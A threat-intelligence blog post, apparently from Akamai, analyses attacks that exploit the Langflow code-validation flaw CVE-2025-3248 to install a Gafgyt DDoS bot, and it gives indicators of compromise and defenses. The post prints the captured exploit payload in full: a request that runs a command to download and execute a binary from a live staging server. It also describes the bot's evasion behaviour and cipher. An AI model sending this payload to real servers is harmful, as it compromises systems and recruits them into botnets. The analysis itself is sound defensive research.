Akamai acquires LayerX, delivering end-to-end security and real-time AI usage control to any browser. Get details

Langflow Exploited to Build Custom DDoS Gafgyt Botnets

Larry Cashdollar

Jul 14, 2026

Larry Cashdollar

Larry Cashdollar

Written by

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Share

Key takeaways

  • Attackers are actively exploiting a remote code execution (RCE) vulnerability within the code validation API endpoint of Langflow, a popular visual framework for prototyping AI and large language model (LLM) applications.

  • Once the framework is breached, the exploit drops a highly customized variant of the veteran Gafgyt distributed denial-of-service (DDoS) bot. This specific payload is stripped of secondary features like cryptominers to focus purely on network flooding, and it hides its command and control (C2) communications using a complex, modified RC4 stream cipher designed to bypass standard automated decoding tools.

  • Because enterprise AI development moves rapidly, teams frequently deploy experimental tools like Langflow in production or staging networks without proper network segmentation, firewall protections, or strict egress filtering — creating a highly trusted environment that allows malicious outbound C2 traffic to easily bypass corporate filters.

  • Defending AI infrastructure requires a return to foundational security protocols: patching arbitrary code execution flaws in AI orchestrators, implementing strict outbound egress filtering (such as blocking unauthorized traffic over port 1337), isolating development environments via web application firewalls (WAFs), and deploying targeted YARA signatures.

The cybersecurity world spent the last few years worrying about advanced AI threats — such as automated phishing, deepfakes, and autonomous malware. However, threat actors are proving that their immediate goals are much more pragmatic. They don't just want to manipulate AI; they want to hijack its underlying infrastructure to fuel traditional, high-volume cybercrime.

Recent threat intelligence reveals a fascinating intersection of modern AI deployment and classic botnet architecture: Attackers are actively exploiting CVE-2025-3248 (an RCE vulnerability in Langflow) to drop a highly customized variant of the veteran Gafgyt/BASHLITE DDoS bot.

In this blog post, I’ll describe how attackers are actively exploiting CVE-2025-3248 to turn cutting-edge AI frameworks into brute-force network weapons.

The initial foothold: CVE-2025-3248

Langflow is a popular visual framework used by developers to prototype and build AI and LLM applications. Because these applications inherently require a way to test and run custom logic, certain endpoints handle code execution.

Attackers have turned this capability against the platform. In the wild, we are seeing the following malicious payload targeting the code validation API:

{
  "code": "import os; os.system(\"wget -q -O /tmp/bot_x86_64 http://184.174.96.191:8088/bot.x86_64 && chmod +x /tmp/bot_x86_64 && /tmp/bot_x86_64\")"
}

Anatomy of the exploit

  • The vulnerability: The /api/v1/validate/code endpoint accepts untrusted Python scripts and executes them on the host system without proper sandboxing.

  • The delivery: The injected code uses standard Python library functions (os.system) to invoke wget.

  • The retrieval: It silently downloads an x86_64 Linux executable from a remote staging server (184.174.96.191:8088), marks it as executable (chmod +x), and launches it directly from the volatile /tmp directory.

Analysis: The Gafgyt/BASHLITE variant

Once executed on the compromised AI server, the dropped file (bot.x86_64) acts as a dedicated remote-controlled network weapon. While rooted in the classic Gafgyt lineage, our static and dynamic analysis reveals that this isn't a generic, copy-and-paste script-kiddie payload. The developer has wrapped standard DDoS features in complex, custom cryptography.

Execution and evasion behavior

Upon startup, the binary performs a sequence designed to hide its presence and prepare its internal engines:

  • The fingerprint: It outputs a taunting ASCII banner to stdout: come at me krebs rimasuta go BRRT (referencing prominent security journalist Brian Krebs and an actor handle rimasuta).

  • Daemonization: It immediately calls clone() to fork a child process, while the parent exits. It then closes standard input, output, and error descriptors (stdio), detaching itself completely from the terminal to run silently in the background.

  • Pure aggression: The binary contains no cryptominers, no persistence mechanisms, and no lateral movement scanners. Its entire execution path is optimized for a single task: network flooding.

The custom cipher and C2 protocol

This variant implements a sophisticated, multiphase modified RC4 stream cipher to secure its C2 communications. The encryption scheme deviates from standard RC4 in three distinct ways to break standard automated decoding tools:

  1. Nonstandard S-box seed: Rather than initializing the S-box linearly, the encryption scheme populates it using a custom arithmetic sequence: $S[i] = (0x0D + i \times 0xA7) \pmod{256}$.

  2. Two-phase key scheduling algorithm (KSA): It uses hardcoded 32-bit keys (0xDEADBEEF, 0xCAFEBABE, etc.) to mutate the S-box, followed by five intense passes of a classic Borland linear congruential generator (LCG) reshuffle.

  3. Modified pseudo-random generation algorithm (PRGA): The keystream bytes are further scrambled using a shifting rolling counter and bitwise operations (ROL and SHR).

Attack capabilities

The bot features four distinct execution paths mapped directly to sendto system calls, aligning with four classic denial-of-service attack vectors:

 

State

Attack vector

Technical mechanism

0x01

UDP flood

Raw sendto loops emitting high-volume UDP datagrams

0x02

TCP flood

Connection and SYN/ACK packet spamming

0x03

HOLD flood

Keep-alive connection exhaustion targeting web servers

0x04

Junk/STD flood

Random-payload UDP floods to exhaust target state tables

Strategic risks to AI infrastructure

It is tempting to think of AI applications as specialized environments isolated from the rest of the enterprise IT stack, but threat actors view them as prime real estate. Hijacking an AI server for a botnet offers several distinct advantages:

  • Massive compute and bandwidth: AI workloads are almost always hosted on high-performance cloud instances or robust enterprise servers. These machines possess the massive network bandwidth necessary to launch devastating DDoS attacks.

  • The “shadow IT” vulnerability: Because AI development is moving at breakneck speed, teams frequently spin up experimental platforms like Langflow in production or staging environments without proper network segmenting, vulnerability management, or firewall protections.

  • Trusted environments: Enterprise cloud infrastructure often enjoys broader outward-facing network permissions, allowing outbound C2 traffic to bypass standard corporate egress filters.

Defense and mitigation

If your team uses Langflow or similar visual AI orchestrators, immediate defensive posture adjustments are strongly recommended.

  • Patch and upgrade: Ensure your Langflow deployments are updated to versions that resolve the arbitrary code execution flaws in the code validation APIs.

  • Implement strict egress filtering: AI training and prototyping environments rarely need unhindered outbound TCP access to arbitrary public IP addresses. Block outbound connections over unusual ports like 1337.

  • Network isolation: Treat AI development environments as untrusted networks. Segment them strictly from primary enterprise environments and restrict public internet access via WAFs.

  • Deploy YARA signatures: Monitor system binaries and volatile directories for the specific cryptographic S-box seed bytes unique to this actor: 0d b4 5b 02 a9 50 f7 9e.

Conclusion

The exploitation of CVE-2025-3248 serves as a stark reminder that the security landscape is shifting, not just evolving. As we rapidly integrate powerful AI frameworks like Langflow into our enterprise stacks, we must resist the urge to view these platforms as isolated or specialized environments. Threat actors are keenly aware of the compute and bandwidth potential within these environments and are weaponizing them with the same tried-and-true methods that have powered botnets for decades.

Securing AI infrastructure requires a return to fundamental security hygiene: robust network segmentation, strict egress filtering, and vigilant patch management. In the race to build the next generation of AI applications, we cannot afford to leave the door open to the ghosts of cybercrime past.

Technical appendix: IOCs and defense

File and system hashes

  • SHA256: e00d92ca28a2cfd75e96f71fc0408747f04942657fcab0f2a25ce79bc3ad23a8

  • ELF build ID (SHA1): 523ae28b0833f9a68f4264d16c803ca5fdc771b9

Network indicators

  • C2 server IP: 184.174.96.191

  • Malware staging port: 8088/TCP (HTTP download)

  • C2 command port: 1337/TCP (Encrypted traffic)

Host signatures

  • Outbound connections to external IPs over port 1337

  • Unrecognized processes running out of /tmp that immediately close standard file descriptors

  • The string come at me krebs rimasuta go BRRT inside standard output logs or memory strings

 
Larry Cashdollar

Jul 14, 2026

Larry Cashdollar

Larry Cashdollar

Written by

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Tags

Share

Related Blog Posts

Security Research
CVE-2026-48282: Mitigating a Critical Vulnerability in Adobe ColdFusion
Discover CVE-2026-48282, a critical path traversal vulnerability in Adobe ColdFusion. Learn about the affected versions and critical patch updates.
Security Research
The New MCP Specification: What Security Teams Must Prepare For
June 25, 2026
As MCP evolves with a new stateless architecture, security responsibility shifts to developers. Learn how Akamai is threat modeling the new specification.
Blogs
Decentralized Threat: Stealthy P2P Cryptominer Targeting Ollama Endpoints
May 21, 2026
The Akamai SIRT uncovered a custom P2P Trojan masquerading as system activity. Learn how to detect and mitigate this stealthy Go-based cryptominer.